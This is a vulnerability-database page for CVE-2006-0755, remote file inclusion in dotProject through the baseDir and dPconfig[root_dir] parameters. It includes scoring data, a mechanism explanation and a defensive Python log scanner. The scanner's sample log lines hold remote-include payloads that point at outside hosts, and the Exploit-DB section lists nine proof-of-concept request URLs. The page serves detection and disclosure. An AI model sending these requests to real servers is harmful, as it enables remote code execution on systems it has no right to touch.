CVE-2006-0755
Published 2006-02-18
Priority P3 (36) · CVSS 3.1 score 5.6 (medium)
CVSS 3.1 vector: AV:N / AC:H / PR:N / UI:N / S:U / C:L / I:L / A:L
Public exploit available
EPSS: 7.85% (93.9th percentile)
Multiple PHP remote file include vulnerabilities in dotProject 2.0.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary commands via the baseDir parameter in (1) db_adodb.php, (2) db_connect.php, (3) session.php, (4) vw_usr_roles.php, (5) calendar.php, (6) date_format.php, and (7) tasks/gantt.php; and the dPconfig[root_dir] parameter in (8) projects/gantt.php, (9) gantt2.php, and (10) vw_files.php. NOTE: the vendor disputes this issue, stating that the product documentation clearly recommends that the system administrator disable register_globals, and that the check.php script warns against this setting. Also, the vendor says that the protection.php/siteurl vector is incorrect because protection.php does not exist in the product.
Mechanism: with register_globals on, PHP turns every request parameter into a global variable before the script runs. These scripts build an include/require path from $baseDir or $dPconfig['root_dir'], values the application is supposed to set from its own configuration, so a request such as ?baseDir=http://attacker/file overrides them and include() fetches and executes the attacker's PHP in the web server's context. Fetching a URL in include() also needs allow_url_fopen (on by default in PHP 4 and 5.1); PHP 5.2 added the separate allow_url_include switch, off by default, and PHP 5.4 removed register_globals entirely, which is why the vendor's "disable register_globals" guidance closes the whole class of vectors at once.
Affected
2 ranges (version bounds are not populated on this page; the CVE text gives "dotProject 2.0.1 and earlier")
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dotproject | dotproject | — | — |
| dotproject | dotproject | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 5.6 | MEDIUM | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L |
| NVD | 2.0 | 5.1 | MEDIUM | AV:N/AC:H/Au:N/C:P/I:P/A:P |
No detection rules found.
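Since the page indexes no detection rule, here is an added example (not dotProject code and not one of the Exploit-DB scripts) that scans Apache/nginx combined-format access logs for requests hitting the ten vectors in the CVE text with a client-supplied baseDir or dPconfig[root_dir]. It distinguishes a live remote include (URL or PHP wrapper value, as in the 2006 PoCs) from any other override of those variables, which a browser has no legitimate reason to send. Assumptions: script paths follow the Exploit-DB titles; db_adodb.php, which the CVE names without a directory, is matched on file name alone; the log lines in SAMPLE_LOG are constructed for illustration.

```python
"""Flag CVE-2006-0755 dotProject remote-file-include attempts in web access logs.

Added example for this page; it is not dotProject code and not one of the
Exploit-DB scripts. SAMPLE_LOG is constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Vulnerable script -> the variable it trusts from the request under register_globals.
# Paths follow the Exploit-DB titles. The CVE text names db_adodb.php without a
# directory, so it is matched on file name alone (assumption: it lives in includes/).
VULN_SCRIPTS = {
    "db_adodb.php": "baseDir",
    "includes/db_connect.php": "baseDir",
    "includes/session.php": "baseDir",
    "modules/admin/vw_usr_roles.php": "baseDir",
    "modules/public/calendar.php": "baseDir",
    "modules/public/date_format.php": "baseDir",
    "modules/tasks/gantt.php": "baseDir",
    "modules/projects/gantt.php": "dPconfig[root_dir]",
    "modules/projects/gantt2.php": "dPconfig[root_dir]",
    "modules/projects/vw_files.php": "dPconfig[root_dir]",
}

# Values that make include() pull code from outside the document root: the
# http/ftp URLs the 2006 PoCs use, plus PHP stream wrappers seen in later RFI.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|phar|expect)://", re.I)

# Apache/nginx "combined" format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def match_script(path):
    """Return (script, param) when the request path ends with a vulnerable script."""
    path = unquote(path).lower()
    for script, param in VULN_SCRIPTS.items():
        if path.endswith(script):
            before = path[: -len(script)]
            # Require a directory boundary so "xdb_adodb.php" is not a hit.
            if before == "" or before.endswith("/"):
                return script, param
    return None


def classify_request(target):
    """Classify one request target; None when it does not touch a vulnerable vector."""
    parts = urlsplit(target)
    hit = match_script(parts.path)
    if hit is None:
        return None
    script, param = hit
    values = parse_qs(parts.query, keep_blank_values=True).get(param)
    if not values:
        return None
    value = values[0]
    # baseDir and dPconfig[root_dir] are set by the application's own config, never
    # by the browser, so any client-supplied value is an override attempt; a URL or
    # wrapper value is a live remote-include attempt.
    kind = "rfi" if REMOTE_RE.match(value) else "override"
    return {"script": script, "param": param, "value": value, "kind": kind}


def scan_log(text):
    """Return one record per access-log line that carries an attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        rec = classify_request(m.group("target"))
        if rec is not None:
            rec.update(client=m.group("client"), time=m.group("time"),
                       status=m.group("status"))
            hits.append(rec)
    return hits


# Constructed log lines: two remote includes (note the trailing "?" that turns
# whatever the script appends to baseDir into a harmless query string), one local
# override, and two benign requests that must not fire.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Feb/2006:10:12:01 +0000] "GET /dotproject/includes/db_connect.php?baseDir=http://198.51.100.9/s.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [14/Feb/2006:10:12:02 +0000] "GET /dotproject/modules/projects/gantt2.php?dPconfig%5Broot_dir%5D=ftp://198.51.100.9/x HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [14/Feb/2006:10:12:03 +0000] "GET /dotproject/modules/public/calendar.php?baseDir=../../tmp/ HTTP/1.0" 500 0 "-" "Mozilla/4.0"
192.0.2.44 - - [14/Feb/2006:10:13:00 +0000] "GET /dotproject/modules/projects/gantt.php?project_id=12 HTTP/1.1" 200 8803 "-" "Mozilla/5.0"
192.0.2.44 - - [14/Feb/2006:10:13:05 +0000] "GET /dotproject/index.php?m=tasks&baseDir=http://203.0.113.99/x HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["time"]} {h["client"]} {h["kind"]:8} {h["script"]} '
              f'{h["param"]}={h["value"]} status={h["status"]}')
```

Caveat: register_globals also imports POST bodies and cookies, which access logs do not record, so this catches the GET form used by the published PoCs only; on a host that still runs PHP 5.3 or older, check `register_globals` and `allow_url_fopen` in the running configuration rather than relying on log review alone. The 2.1.6 entry below does not show its vector on this page, so nothing here covers it.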
Exploit-DB
dotProject 2.1.6 - Remote File Inclusion (exploitdb, 2012-11-14; indexed under CVE-2006-0755). This entry claims dotProject <= 2.1.6, a later release than the "2.0.1 and earlier" range in the CVE text; only the advisory header is reproduced on this page, so its vector is not shown.
---
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-11-13 ]
#################################################################
# [ dotProject <= 2.1.6 ] Remote File Inclusion Vulnerability #
#################################################################
#
# Script: "PHP web-based project management framework that includes modules for companies,
# projects, tasks (with Gantt charts), forums, files, calendar, contacts, tickets/helpdesk,
# multi-language support, user/module permissions and themes"
#
# Vendor: http://www.dotproject.net/
# Download: http://sourceforge.net/projects/dotproject/f
Exploit-DB
Nine entries dated 2006-02-14, one per vector, all indexed under CVE-2006-0755 and all sourced from SecurityFocus BID 16648 (https://www.securityfocus.com/bid/16648/info) with the same description. Exploit-DB carries nine of the ten vectors in the CVE text; db_adodb.php has no entry.
dotProject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Proof-of-concept request for each entry ([REMOTE INCLUDE] stands for the URL of an attacker-hosted file containing PHP):
dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion
http://www.example.com/modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
dotProject 2.0 - '/modules/public/calendar.php?baseDir' Remote File Inclusion
http://www.example.com/modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
dotProject 2.0 - '/includes/db_connect.php?baseDir' Remote File Inclusion
http://www.example.com/includes/db_connect.php?baseDir=[REMOTE INCLUDE]
dotProject 2.0 - '/modules/projects/gantt2.php?dPconfig[root_dir]' Remote File Inclusion
http://www.example.com/modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
dotProject 2.0 - '/modules/tasks/gantt.php?baseDir' Remote File Inclusion
http://www.example.com/modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]
dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion
http://www.example.com/modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
dotProject 2.0 - '/includes/session.php?baseDir' Remote File Inclusion
http://www.example.com/includes/session.php?baseDir=[REMOTE INCLUDE]
dotProject 2.0 - '/modules/admin/vw_usr_roles.php?baseDir' Remote File Inclusion
http://www.example.com/modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion
http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
No writeups or analysis indexed.
References
http://secunia.com/advisories/18879
http://www.osvdb.org/23209
http://www.osvdb.org/23210
http://www.osvdb.org/23211
http://www.osvdb.org/23212
http://www.osvdb.org/23213
http://www.osvdb.org/23214
http://www.osvdb.org/23215
http://www.osvdb.org/23216
http://www.osvdb.org/23217
http://www.osvdb.org/23218
http://www.osvdb.org/23219
http://www.securityfocus.com/archive/1/424957/100/0/threaded
http://www.securityfocus.com/archive/1/425285/100/0/threaded
http://www.securityfocus.com/bid/16648
http://www.vupen.com/english/advisories/2006/0604
https://exchange.xforce.ibmcloud.com/vulnerabilities/24738